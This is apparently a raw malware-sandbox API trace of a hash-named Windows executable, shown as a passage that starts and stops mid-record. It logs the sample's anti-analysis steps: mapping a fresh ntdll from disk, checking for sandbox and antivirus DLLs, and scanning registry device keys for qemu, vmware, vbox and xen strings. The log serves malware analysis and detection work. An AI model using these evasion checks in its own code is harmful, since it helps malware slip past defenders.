[194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0100.503] ResumeThread (hThread=0x114) returned 0x1 [0100.540] CloseHandle (hObject=0x114) returned 1 [0100.540] CloseHandle (hObject=0x118) returned 1 [0100.540] ExitProcess (uExitCode=0x0) [0100.541] HeapValidate (hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f05a8) returned 1 [0100.541] HeapFree (in: hHeap=0x8f0000, dwFlags=0x0, lpMem=0x8f05a8 | out: hHeap=0x8f0000) returned 1 Thread: id = 2 os_tid = 0xe10 Process: id = "2" image_name = "6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" page_root = "0x32212000" os_pid = "0x2dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1378" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 318 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 319 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 320 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 321 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 322 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 323 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 324 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 325 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 326 start_va = 0x400000 end_va = 0x461fff monitored = 1 entry_point = 0x41c630 region_type = mapped_file name = "6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe") Region: id = 327 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 328 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 329 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 330 start_va = 0x7fff0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 331 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 332 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 334 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 335 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 336 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 337 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 338 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 339 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 340 start_va = 0x410000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 341 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 342 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 343 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 344 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 345 start_va = 0x480000 end_va = 0x53dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 346 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 347 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 348 start_va = 0x410000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 349 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 350 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 351 start_va = 0x640000 end_va = 0x7c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 352 start_va = 0x7d0000 end_va = 0x7f9fff monitored = 0 entry_point = 0x7d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 353 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 354 start_va = 0x7d0000 end_va = 0x950fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 355 start_va = 0x960000 end_va = 0x1d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 356 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 357 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 358 start_va = 0x1c0000 end_va = 0x1c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 359 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 360 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 361 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 362 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 363 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 364 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 365 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 366 start_va = 0x1d60000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 367 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 368 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 369 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 370 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 371 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 372 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 373 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 374 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 375 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 376 start_va = 0x1d60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 377 start_va = 0x1ea0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 378 start_va = 0x1eb0000 end_va = 0x202afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 379 start_va = 0x2030000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 380 start_va = 0x1d0000 end_va = 0x1d5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 381 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 806 start_va = 0x450000 end_va = 0x465fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Thread: id = 3 os_tid = 0x348 [0100.617] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="kernel32" | out: DestinationString="kernel32") [0100.617] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x74f30000) returned 0x0 [0100.618] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="user32" | out: DestinationString="user32") [0100.618] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x750d0000) returned 0x0 [0100.704] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="advapi32" | out: DestinationString="advapi32") [0100.704] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x77b10000) returned 0x0 [0102.246] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="shell32" | out: DestinationString="shell32") [0102.246] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x75690000) returned 0x0 [0111.197] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0111.198] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4775b0 [0111.198] GetKeyboardLayoutList (in: nBuff=1, lpList=0x4775b0 | out: lpList=0x4775b0) returned 1 [0111.199] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb0c | out: TokenHandle=0x19fb0c*=0x150) returned 1 [0111.199] GetTokenInformation (in: TokenHandle=0x150, TokenInformationClass=0x19, TokenInformation=0x19fb10, TokenInformationLength=0x14, ReturnLength=0x19fb08 | out: TokenInformation=0x19fb10, ReturnLength=0x19fb08) returned 1 [0111.199] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x19fd4c, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0111.200] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0111.201] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x158 [0111.201] MapViewOfFile (hFileMappingObject=0x158, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1eb0000 [0111.204] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd50, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe")) returned 0x62 [0111.205] wcsstr (_Str="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe", _SubStr="7869.vmt") returned 0x0 [0111.205] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x19ff4c, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x19ff4c, ResultLength=0x0) returned 0x0 [0111.205] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19ff54, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ff54, ReturnLength=0x0) returned 0x0 [0111.206] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0111.206] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0111.206] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0111.206] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x478950 [0111.206] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0111.206] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0111.206] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x0) returned 0xc0000034 [0111.207] LocalFree (hMem=0x478950) returned 0x0 [0111.245] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x478950 [0111.245] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0111.245] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0111.245] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x15c) returned 0x0 [0111.245] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0111.246] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x47a1b0 [0111.246] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x47a1b0, Length=0x2c, ResultLength=0x19ff48 | out: KeyInformation=0x47a1b0, ResultLength=0x19ff48) returned 0x0 [0111.246] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0111.246] LocalAlloc (uFlags=0x40, uBytes=0x4e) returned 0x47aac0 [0111.246] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x47aac0, Length=0x4e, ResultLength=0x19ff48 | out: KeyInformation=0x47aac0, ResultLength=0x19ff48) returned 0x0 [0111.247] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="qemu") returned 0x0 [0111.247] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="virtio") returned 0x0 [0111.247] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vmware") returned 0x0 [0111.247] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vbox") returned 0x0 [0111.247] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="xen") returned 0x0 [0111.248] LocalFree (hMem=0x47aac0) returned 0x0 [0111.248] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0111.248] LocalAlloc (uFlags=0x40, uBytes=0x44) returned 0x47aac0 [0111.248] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x47aac0, Length=0x44, ResultLength=0x19ff48 | out: KeyInformation=0x47aac0, ResultLength=0x19ff48) returned 0x0 [0111.250] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="qemu") returned 0x0 [0111.250] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="virtio") returned 0x0 [0111.250] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vmware") returned 0x0 [0111.250] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vbox") returned 0x0 [0111.250] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="xen") returned 0x0 [0111.250] LocalFree (hMem=0x47aac0) returned 0x0 [0111.251] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0111.251] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x47aac0 [0111.251] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x47aac0, Length=0x50, ResultLength=0x19ff48 | out: KeyInformation=0x47aac0, ResultLength=0x19ff48) returned 0x0 [0111.252] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="qemu") returned 0x0 [0111.252] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="virtio") returned 0x0 [0111.252] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vmware") returned 